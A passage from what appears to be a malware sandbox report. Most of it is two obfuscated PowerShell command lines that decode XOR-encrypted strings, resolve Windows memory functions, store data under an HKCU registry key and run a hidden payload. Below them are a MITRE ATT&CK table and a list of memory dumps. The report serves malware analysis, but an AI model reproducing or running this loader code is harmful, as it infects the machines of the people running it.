Tp'SyADiBOhDmoAEnEfiBArEUf3SiEAnEChEBe1FoEHeBraFLiCunFPeBSlFdaDSjESnEMiEHu9EnEBl6DeEFo4LuASpFbaBUn2AsAOpFKuAAyByiDOvACaEHa7BoEAm5SyFNoBOvEFi6BeEbrBAfEStARuECi3MoENo6VeELa8DiBFnBCoBNi9ImAUn1TjCFa6PaERh1BaFBe9siERe0UnEPa4SpEdaATuAEp7InDSi4EpCSt6TaEAt1SeFPoBNoDFjFCaFReBCoFCoDFlDUd2TeBHj5huBMa5SjDNo5AuEKaALaFHiDviEIn0KlAPi3SpASlFUdBCuCecBMo8SmBHaEDrBFoADeBEn7OmBAg6InBToESnBUnDUnAGr3StASkFImBBlFSpFCo7PaBInCBoBPsFLiBElFToBBrFJrASa3AfAUnFHeBSuFTiFSk7ScBPaBSlAAu6Pe'po;Un&In(Te`$SaLOpeSupHeuHesDe7Gu)Co Go`$KerBaePalRoaAtxTaiXenSogNo8Aa;by`$AlFudeBelBrlBeiApnSpgco0In0Pr=Fj'KrHOrKNoCFoURe:no\BiRPoeAufFaeLarBaeponNacAveInkBooPorSotAfeScnBreEx9Co0Go\SkLReyFokUkkGleNarVaiPadKrdMoeNarReeErnkosCu'Si;Un`$AnFRiePolKolDeiRinBigGy0Sp1Mi Me=LaALilUniSapToeJadFa0Me Sy'RoAViBSaFjaCFeFPlABiESe3ReFTeBLoEdrEtrEVe1TrEPrAAnFHiCdiFEnCDiBSi2BoARe7FaCCi8ChEInAChFMiBRvADe2DiCHa6FlFBsBGoEinASuEFj2HoDTrFLgFVaDOmETh0AfFCpFSaEPaATrFDrDMoFUnBSnFVa6ReARaFMeASe2ThDsiFDeEOuEPyFElBUnEIn7BeASpFfoAToBKoCPe9SaECaAPeEGe3MoESa3BiEJo6OpEPi1LdESc8SvBunFFeBReFreAPo6SuAAn1StFkiBBrEcaEGuEGe3DyESkABeEGa0SvFtiDKoEPa8SkEspEMiEMi1PrEMiAPhFKrDKr'Re;Ri&Li(sa`$BeLPeePepMeuStsKn7Pr)Pa Re`$ArFAfeExlSilSkiGynSvgla0Sj1la;Br`$InrNeeSllplaMaxHyivanNogko9De Sm=Kr PrAHylGriDipCoeArdDe0la Ro'VeAPsBMiFArDalECaAHeEUd3FoEAnEUnFKl7SoEGa6OaENa1QuEAf8MoAFyFUeBin2BoAReFPrDFr4InDOrCUnFBr6MoFAmCAkFTjBdaESaAfaEHa2PlAAd1RoCArCQuEba0FoESt1FiFTa9InEGiAAgFkaDHkFOvBTrDPh2NeBFo5UnBko5ArCsm9BuFUnDSaENo0UdEHn2ArCToDReEStEGeFFeCAlEPoANiBbe9prBStBmaDNoCPaFDeBGoFUbDWoERo6OpEPi1TiEMi8PrAWh7poASiBAnFTiCLmFPoAUnEFr3FoFNyBGeEacEOpEMa1SlEMiAToFDaCOvFStCLbAIn6sp'Fo;Ma&Af(Re`$UpLDeeEdpOvuUnsSu7Ls)Nu Mu`$RerHyeOplfeaAnxBiiAfnCogHi9Zu;Ec`$ScsRruAnlSctSkaEmnMieResopsci0So Na=De TaAFilViimipPoeHudli0ac Co'DeDDe4AdDGeCSuFIn6FaFEfCSkFGrBSuEJoABaEIn2paAUd1PaDInDWaFFoAlaEAu1AuFTiBBaEUn6ReEDe2CaEOrAFoAgr1KeCPr6MiEUg1BoFadBBeEAfASpFHaDStEDe0ChFLaFBrDThCNoELuAReFolDGaFTe9EfEco6KnETeCGlEOvAMaFfaCSkASo1PaCLu2ExETeEamFReDFoFLiCTiELe7FaEEnEorEBl3RuDra2DiBBa5InBFe5AnCHeCKlEUd0KiFSlFGeFPr6VaAav7OnADaBDeFBeDPaEdeAJaEOu3OcESaEGeFVa7InEch6ChEre1CuEUn8InAZo3grAPrFLlBHaFImAMi3HjAUnFShACoFArAHaBZoCHo9ChEobAKrESe3TrEAl3PeEUn6SeEUf1LaEUm8TaBScCDaAHm3StAAnFDoBGo9RnBInASpBasAafARe6El'Ba;Au&Re(Lr`$RiLPaefipMouFusYt7di)Ko un`$TasSeuDelFotSaaNrndievasSusIc0Fu;Tn`$SiIUonPrdBueOvmBinBriJafPiiLecAfaBatDeiKuoPinBosTo7Tr7Mo=Me`$ParjoeLylToaLixPniHenHygHy.RacTooReuFinTotPu-Ar6Dr5Fo5Le;Su`$AfsWeuPelEntSyatrnAueDrshvsMe1Sh Im=Pe ToATalCaiUlpSpetrdUn0sp Ch'VeDBi4DiDTiCEsFTj6VaFKaCReFLoBFoENoALoEed2TaASy1trDFrDBoFemALnEEx1InFDuBHeEFu6TyESt2stEArASiAPo1LiCPr6ArEEk1SnFReBEuEVaABoFSkDTyEBa0SoFkuFPrDEmCBoEStAHoFAbDTeFIn9GyEFa6OvEKrCSpEFaAOiFWaCNeAAs1UdCTr2MuELaEErFTeDreFFeCJeEBl7SuEGlESkEHj3UnDMa2reBMi5MaBCi5FaCFoCCyEOm0asFTrFStFFu6MrASu7StAKrBAfFUnDPrEudABuESu3deECoERaFKa7LeETe6PaEMo1CrENi8MoATe3PuAlaFLiBDu9RsButAWiBStAMaAFo3SkACyFSiAcaBliDovAFiEtoBSkEek3ThESkEAfEPr1TrEEmBfaFScCToFVeBSyFBoDKaEFiEBoESm9FlEKn6OsEKr4skAUn3CyAFrFSoAUnBFjCCa6SnEVo1DoEOvBHeEPsAStEvr2TuEEs1CoEdo6afECo9SuESc6VaEPeCmoECoEnuFViBBaEst6BrECu0ReEin1HiFSkCPoBCa8SaBRe8SpAUn6Ra'Ci;Tr&Gr(Ca`$AlLEbebupHauElsOx7So)Po Un`$SisTruEnluntNoaPrnReeSusHosIn1Do;Fo`$UdsEtuRulMotBoaAdnKoeBosEcsTe2Ma Ge=Cr FoAdrlMaiGopMoeEldTe0De Me'ElASlBpaCSt3SiESeEInFMoDAhESvBcaEArAStFHaDSkECoAFoETe3SiEPt3KoESk6UnFCuBPaEBrAFoATaFLeBPl2BuAVaFExDKy4NoDBuCunFHu6PiFFeCAaFCaBTaEAuADrENd2UnAEp1PeDToDAlFCeAGrEMe1GaFhuBAnELo6GeEKo2DiECuAsaADo1PaCKa6PrEKu1AfFUdBHaEFaASmFEpDMaEKo0MeFOrFSnDUaCAbESkAReFAsDGaFSi9BaEFo6CiEPlCChEprACoFFoCFiAve1GeCNo2BlEStEEfFHiDOuFOsCElETr7MdEKaESmEBr3GuDTe2OoBLa5ReBai5IsCOv8MaEPrASyFExBfuCCoBRuENaAUdESo3UnEWhAKoESa8OpEInELaFChBcaEUnAUdCTa9CrEAi0FiFBeDNoCBe9BoFGrAPoESm1HaEYaCAfFAsBKvECa6AnEAz0NoERe1OvDAlFBeEVe0MeEGr6OgEEn1EtFakBpyEHeARoFTaDFoASa7ViAJu7GrEAs9SeERd4tiFUnFEfAIdFBeAFlBPaDSsDFoEMiAOoEDe8TrFpoDJeEbaAunFKeBliFsuBKoEFoATrFVeDReFGoCUnAFlFFiAAnBKoEKaEZeEHe9HyFHnDUnEFo6UnEPeCWoECoEWhEBe1EsEFr6OhFMoCTuFStBHiASa6CoATo3ShADyFCrASp7yeCPh8TiCDaBDoDBeBKoASoFTeCFlFTrASc7GoDEn4FiCGe6UeEMi1CrFwhBPnDStFGrFOuBStFLoDpaDAu2AnAFl3PeAEdFBrDDi4OvCSe6waERe1ReFHaBOsDWiFUsFMaBMoFJaDKoDba2ScACe3AaAgrFBlDLa4brCFu6WiEAt1TiFUfBVoDOxFUnFjoBDeFApDTvDgr2LeALu3UnADeFFoDor4ScCOp6AtEHa1MyFTnBPeDefFHoFBaBQuFDeDGrDTo2AmASk3SuAImFDaDco4AmCEx6BaEsl1feFMaBSkDSaFGiFStBroFFiDGaDse2DiAPo6SoAOrFHiACa7SnDSn4MaCCo6ReECh1MiFheBAlDrhFBuFAdBSoFonDMuDIs2CoASu6UnARi6NiATe6Un'ha;Ch&Ho(Pe`$UdLHeeblpHjuGlsHe7Im)re Ta`$TesSluVrlOvttraStnVeeUnsPusLu2Gi;No`$UdsacuAvlShtAgaDenHoecisBlsEf3Le An=Dp MeAUdlBaiSqpObeprdAn0Na cl'GaACuBSvCPu3WhEStEWhFOmDMaEStBKnESpAFrFApDtiESvAKoETh3FiEBe3GaEMe6HyFSuBSeEDiAToAPh1maCFe6ReETe1KaFSp9poEVr0InEFa4DaEInAteAPr7NeABeBAsCTi9PaEMeAToECh3GoEto3MaEOv6KaESt1FoEUn8QuBDkCuvAFl3OwAPrBBeDurAViEBeBImEGl3BeEVeEDeEPe1BuEPrBUdFPaCUnFTeBJeFHuDChESkEPrEAr9PlEMu6SsEDr4InALb3CrAKiBStDPaCDeESe7AfEAnEInEAfBSpFavASuEDe9TrABa3StBwaFPrASa3HeBReFCuAOx6Re'As;Br&Ud(Pa`$PuLToeDopViuBosLs7Cm)Un Sp`$HusMauOxlUntChaSynMaeMisAbsFo3Te#Tr;""";;Function sultaness9 { param([String]$Jammerklagernes); For($Generationskonferencerne=2; $Generationskonferencerne -lt $Jammerklagernes.Length-1; $Generationskonferencerne+=(2+1)){ $Aliped = $Aliped + $Jammerklagernes.Substring($Generationskonferencerne, 1); } $Aliped;}$Guidelines0 = sultaness9 'St Lo An Ko Ti Gr Gn An Ti Co Yd So Di ge Wo Sa fo Tr Su St Ny Sw La FoIgrELiXPa ';$Guidelines1= sultaness9 $Mosters;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Guidelines1 ;}else{.$Guidelines0 $Guidelines1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Aliped0 { param([String]$Jammerklagernes); $Mannerless = New-Object byte[] ($Jammerklagernes.Length / 2); For($Generationskonferencerne=0; $Generationskonferencerne -lt $Jammerklagernes.Length; $Generationskonferencerne+=2){ $Oculinidae = $Jammerklagernes.Substring($Generationskonferencerne, 2); $Mannerless[$Generationskonferencerne/2] = [convert]::ToByte($Oculinidae, 16); $Mannerless[$Generationskonferencerne/2] = ($Mannerless[$Generationskonferencerne/2] -bxor 143); } [String][System.Text.Encoding]::ASCII.GetString($Mannerless);}$Sparegris0=Aliped0 'DCF6FCFBEAE2A1EBE3E3';$Sparegris1=Aliped0 'C2E6ECFDE0FCE0E9FBA1D8E6E1BCBDA1DAE1FCEEE9EAC1EEFBE6F9EAC2EAFBE7E0EBFC';$Sparegris2=Aliped0 'C8EAFBDFFDE0ECCEEBEBFDEAFCFC';$Sparegris3=Aliped0 'DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9';$Sparegris4=Aliped0 'FCFBFDE6E1E8';$Sparegris5=Aliped0 'C8EAFBC2E0EBFAE3EAC7EEE1EBE3EA';$Sparegris6=Aliped0 'DDDBDCFFEAECE6EEE3C1EEE2EAA3AFC7E6EBEACDF6DCE6E8A3AFDFFAEDE3E6EC';$Sparegris7=Aliped0 'DDFAE1FBE6E2EAA3AFC2EEE1EEE8EAEB';$Sparegris8=Aliped0 'DDEAE9E3EAECFBEAEBCBEAE3EAE8EEFBEA';$Sparegris9=Aliped0 'C6E1C2EAE2E0FDF6C2E0EBFAE3EA';$Lepus0=Aliped0 'C2F6CBEAE3EAE8EEFBEADBF6FFEA';$Lepus1=Aliped0 'CCE3EEFCFCA3AFDFFAEDE3E6ECA3AFDCEAEEE3EAEBA3AFCEE1FCE6CCE3EEFCFCA3AFCEFAFBE0CCE3EEFCFC';$Lepus2=Aliped0 'C6E1F9E0E4EA';$Lepus3=Aliped0 'DFFAEDE3E6ECA3AFC7E6EBEACDF6DCE6E8A3AFC1EAF8DCE3E0FBA3AFD9E6FDFBFAEEE3';$Lepus4=Aliped0 'D9E6FDFBFAEEE3CEE3E3E0EC';$Lepus5=Aliped0 'E1FBEBE3E3';$Lepus6=Aliped0 'C1FBDFFDE0FBEAECFBD9E6FDFBFAEEE3C2EAE2E0FDF6';$Lepus7=Aliped0 'C6CAD7';$Lepus8=Aliped0 'D3';$Regretters=Aliped0 'DADCCADDBCBD';$africanist=Aliped0 'CCEEE3E3D8E6E1EBE0F8DFFDE0ECCE';function fkp {Param ($Bedlar, $Catonically) ;$relaxing0 =Aliped0 'ABDFE0FBEAE1ECF6AFB2AFA7D4CEFFFFCBE0E2EEE6E1D2B5B5CCFAFDFDEAE1FBCBE0E2EEE6E1A1C8EAFBCEFCFCEAE2EDE3E6EAFCA7A6AFF3AFD8E7EAFDEAA2C0EDE5EAECFBAFF4AFABD0A1C8E3E0EDEEE3CEFCFCEAE2EDE3F6CCEEECE7EAAFA2CEE1EBAFABD0A1C3E0ECEEFBE6E0E1A1DCFFE3E6FBA7ABC3EAFFFAFCB7A6D4A2BED2A1CAFEFAEEE3FCA7ABDCFFEEFDEAE8FDE6FCBFA6AFF2A6A1C8EAFBDBF6FFEAA7ABDCFFEEFDEAE8FDE6FCBEA6';&($Lepus7) $relaxing0;$relaxing5 = Aliped0 'ABE3FCEAE9EAFDE6EAFDE1EAAFB2AFABDFE0FBEAE1ECF6A1C8EAFBC2EAFBE7E0EBA7ABDCFFEEFDEAE8FDE6FCBDA3AFD4DBF6FFEAD4D2D2AFCFA7ABDCFFEEFDEAE8FDE6FCBCA3AFABDCFFEEFDEAE8FDE6FCBBA6A6';&($Lepus7) $relaxing5;$relaxing1 = Aliped0 'FDEAFBFAFDE1AFABE3FCEAE9EAFDE6EAFDE1EAA1C6E1F9E0E4EAA7ABE1FAE3E3A3AFCFA7D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9D2A7C1EAF8A2C0EDE5EAECFBAFDCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9A7A7C1EAF8A2C0EDE5EAECFBAFC6E1FBDFFBFDA6A3AFA7ABDFE0FBEAE1ECF6A1C8EAFBC2EAFBE7E0EBA7ABDCFFEEFDEAE8FDE6FCBAA6A6A1C6E1F9E0E4EAA7ABE1FAE3E3A3AFCFA7ABCDEAEBE3EEFDA6A6A6A6A3AFABCCEEFBE0E1E6ECEEE3E3F6A6A6';&($Lepus7) $relaxing1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicinalvarefabrikker,[Parameter(Position = 1)] [Type] $Rbdig = [Void]);$relaxing2 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCAFB2AFD4CEFFFFCBE0E2EEE6E1D2B5B5CCFAFDFDEAE1FBCBE0E2EEE6E1A1CBEAE9E6E1EACBF6E1EEE2E6ECCEFCFCEAE2EDE3F6A7A7C1EAF8A2C0EDE5EAECFBAFDCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CEFCFCEAE2EDE3F6C1EEE2EAA7ABDCFFEEFDEAE8FDE6FCB7A6A6A3AFD4DCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CAE2E6FBA1CEFCFCEAE2EDE3F6CDFAE6E3EBEAFDCEECECEAFCFCD2B5B5DDFAE1A6A1CBEAE9E6E1EACBF6E1EEE2E6ECC2E0EBFAE3EAA7ABDCFFEEFDEAE8FDE6FCB6A3AFABE9EEE3FCEAA6A1CBEAE9E6E1EADBF6FFEAA7ABC3EAFFFAFCBFA3AFABC3EAFFFAFCBEA3AFD4DCF6FCFBEAE2A1C2FAE3FBE6ECEEFCFBCBEAE3EAE8EEFBEAD2A6';&($Lepus7) $relaxing2;$relaxing3 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCA1CBEAE9E6E1EACCE0E1FCFBFDFAECFBE0FDA7ABDCFFEEFDEAE8FDE6FCB9A3AFD4DCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CCEEE3E3E6E1E8CCE0E1F9EAE1FBE6E0E1FCD2B5B5DCFBEEE1EBEEFDEBA3AFABC2EAEBE6ECE6E1EEE3F9EEFDEAE9EEEDFDE6E4E4EAFDA6A1DCEAFBC6E2FFE3EAE2EAE1FBEEFBE6E0E1C9E3EEE8FCA7ABDCFFEEFDEAE8FDE6FCB8A6';&($Lepus7) $relaxing3;$relaxing4 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCA1CBEAE9E6E1EAC2EAFBE7E0EBA7ABC3EAFFFAFCBDA3AFABC3EAFFFAFCBCA3AFABDDEDEBE6E8A3AFABC2EAEBE6ECE6E1EEE3F9EEFDEAE9EEEDFDE6E4E4EAFDA6A1DCEAFBC6E2FFE3EAE2EAE1FBEEFBE6E0E1C9E3EEE8FCA7ABDCFFEEFDEAE8FDE6FCB8A6';&($Lepus7) $relaxing4;$relaxing5 = Aliped0 'FDEAFBFAFDE1AFABDDE6FBE0FDE1EAE3E3EAE1FCA1CCFDEAEEFBEADBF6FFEAA7A6';&($Lepus7) $relaxing5 ;}$fejlagtiges = Aliped0 'E4EAFDE1EAE3BCBD';$relaxing6 = Aliped0 'ABDAE7E5FBE6EBEAE3E6E8BBB9AFB2AFD4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5C8EAFBCBEAE3EAE8EEFBEAC9E0FDC9FAE1ECFBE6E0E1DFE0E6E1FBEAFDA7A7E9E4FFAFABE9EAE5E3EEE8FBE6E8EAFCAFABC3EAFFFAFCBBA6A3AFA7C8CBDBAFCFA7D4C6E1FBDFFBFDD2A3AFD4DAC6E1FBBCBDD2A3AFD4DAC6E1FBBCBDD2A3AFD4DAC6E1FBBCBDD2A6AFA7D4C6E1FBDFFBFDD2A6A6A6';&($Lepus7) $relaxing6;$Shaduf = fkp $Lepus5 $Lepus6;$relaxing7 = Aliped0 'ABC9EAE3E3E6E1E8BCAFB2AFABDAE7E5FBE6EBEAE3E6E8BBB9A1C6E1F9E0E4EAA7D4C6E1FBDFFBFDD2B5B5D5EAFDE0A3AFB9BABAA3AFBFF7BCBFBFBFA3AFBFF7BBBFA6';&($Lepus7) $relaxing7;$relaxing8 = Aliped0 'ABDAEBE3EEE1EBFCFBFDEEE9E6E4AFB2AFABDAE7E5FBE6EBEAE3E6E8BBB9A1C6E1F9E0E4EAA7D4C6E1FBDFFBFDD2B5B5D5EAFDE0A3AFBCB8BEBAB7B6BEBDA3AFBFF7BCBFBFBFA3AFBFF7BBA6';&($Lepus7) $relaxing8;$Felling00='HKCU:\Referencekortene90\Lykkeridderens';$Felling01 =Aliped0 'ABFCFAE3FBEEE1EAFCFCB2A7C8EAFBA2C6FBEAE2DFFDE0FFEAFDFBF6AFA2DFEEFBE7AFABC9EAE3E3E6E1E8BFBFA6A1FBEEE3EAE0FDE8EEE1EAFD';&($Lepus7) $Felling01;$relaxing9 = Aliped0 'ABFDEAE3EEF7E6E1E8AFB2AFD4DCF6FCFBEAE2A1CCE0E1F9EAFDFBD2B5B5C9FDE0E2CDEEFCEAB9BBDCFBFDE6E1E8A7ABFCFAE3FBEEE1EAFCFCA6';&($Lepus7) $relaxing9;$sultaness0 = Aliped0 'D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5CCE0FFF6A7ABFDEAE3EEF7E6E1E8A3AFBFA3AFAFABC9EAE3E3E6E1E8BCA3AFB9BABAA6';&($Lepus7) $sultaness0;$Indemnifications77=$relaxing.count-655;$sultaness1 = Aliped0 'D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5CCE0FFF6A7ABFDEAE3EEF7E6E1E8A3AFB9BABAA3AFABDAEBE3EEE1EBFCFBFDEEE9E6E4A3AFABC6E1EBEAE2E1E6E9E6ECEEFBE6E0E1FCB8B8A6';&($Lepus7) $sultaness1;$sultaness2 = Aliped0 'ABC3EEFDEBEAFDEAE3E3E6FBEAAFB2AFD4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5C8EAFBCBEAE3EAE8EEFBEAC9E0FDC9FAE1ECFBE6E0E1DFE0E6E1FBEAFDA7A7E9E4FFAFABDDEAE8FDEAFBFBEAFDFCAFABEEE9FDE6ECEEE1E6FCFBA6A3AFA7C8CBDBAFCFA7D4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A6AFA7D4C6E1FBDFFBFDD2A6A6A6';&($Lepus7) $sultaness2;$sultaness3 = Aliped0 'ABC3EEFDEBEAFDEAE3E3E6FBEAA1C6E1F9E0E4EAA7ABC9EAE3E3E6E1E8BCA3ABDAEBE3EEE1EBFCFBFDEEE9E6E4A3ABDCE7EEEBFAE9A3BFA3BFA6';&($Lepus7) $sultaness3#"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/840-54-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/1352-62-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/1352-55-0x0000000000000000-mapping.dmp

Download
memory/1352-57-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmp

Filesize
10.1MB

Download
memory/1352-59-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/1352-58-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmp

Filesize
11.4MB

Download
memory/1352-65-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/1584-61-0x0000000075FF1000-0x0000000075FF3000-memory.dmp

Filesize
8KB

Download
memory/1584-63-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/1584-64-0x0000000005DC0000-0x0000000008130000-memory.dmp

Filesize
35.4MB

Download
memory/1584-60-0x0000000000000000-mapping.dmp

Download
memory/1584-66-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/1584-67-0x0000000005DC0000-0x0000000008130000-memory.dmp

Filesize
35.4MB

Download

Analysis

Sharing